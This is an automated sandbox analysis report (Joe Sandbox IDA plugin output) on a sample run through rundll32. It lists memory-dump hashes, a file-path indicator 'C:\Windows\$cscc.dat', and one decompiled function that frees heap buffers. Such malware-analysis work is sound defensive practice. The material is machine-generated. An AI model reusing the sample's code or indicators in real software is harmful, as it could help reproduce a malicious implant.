                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CombinePath
                                                                                                          • String ID: C:\Windows\$cscc.dat
                                                                                                          • API String ID: 3422762182-1946977352
                                                                                                          • Opcode ID: 4c364e0207856bf0a904c538e8112111a49d84820825c5635b63ec3c584dbbc1
                                                                                                          • Instruction ID: 3329bbbe2f4dd416d9c3cc2e306bb894a8b8d385c749b30bd9e87f7259a7b649
                                                                                                          • Opcode Fuzzy Hash: 4c364e0207856bf0a904c538e8112111a49d84820825c5635b63ec3c584dbbc1
                                                                                                          • Instruction Fuzzy Hash: 7CC012713852253745112E965D0595ABE9CFBA5BA23018121FD04D6010CAA5E91186D5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4682F(void** _a4) {
                                                                                                          				void* _t3;
                                                                                                          				void* _t4;
                                                                                                          				void** _t7;
                                                                                                          				void* _t8;
                                                                                                          
                                                                                                          				_t7 = _a4;
                                                                                                          				if(_t7 != 0) {
                                                                                                          					_t4 =  *_t7;
                                                                                                          					if(_t4 != 0) {
                                                                                                          						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
                                                                                                          					}
                                                                                                          					_t8 = _t7[1];
                                                                                                          					if(_t8 != 0) {
                                                                                                          						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
                                                                                                          					}
                                                                                                          					return _t4;
                                                                                                          				}
                                                                                                          				return _t3;
                                                                                                          			}







                                                                                                          0x04a46833
                                                                                                          0x04a46838
                                                                                                          0x04a4683a
                                                                                                          0x04a4684c
                                                                                                          0x04a46854
                                                                                                          0x04a46854
                                                                                                          0x04a46856
                                                                                                          0x04a4685b
                                                                                                          0x04a46863
                                                                                                          0x04a46863
                                                                                                          0x00000000
                                                                                                          0x04a46866
                                                                                                          0x04a46869

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000000), ref: 04A46851
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A46854
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A46860
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A46863
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859560861-0
                                                                                                          • Opcode ID: e22b5a5e6868430b798d3ff407c05fb3c6606ca435f85631bba5d7a4ce9b6e89
                                                                                                          • Instruction ID: e18c8f857c4489834de1eb152cc761fc9c537d7ba607a7e60eefbaf30ace175b
                                                                                                          • Opcode Fuzzy Hash: e22b5a5e6868430b798d3ff407c05fb3c6606ca435f85631bba5d7a4ce9b6e89
                                                                                                          • Instruction Fuzzy Hash: 18E0127270035867EA109ED69CC4F1BB79CDBD5761F044036E704DB540C565EC018AB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%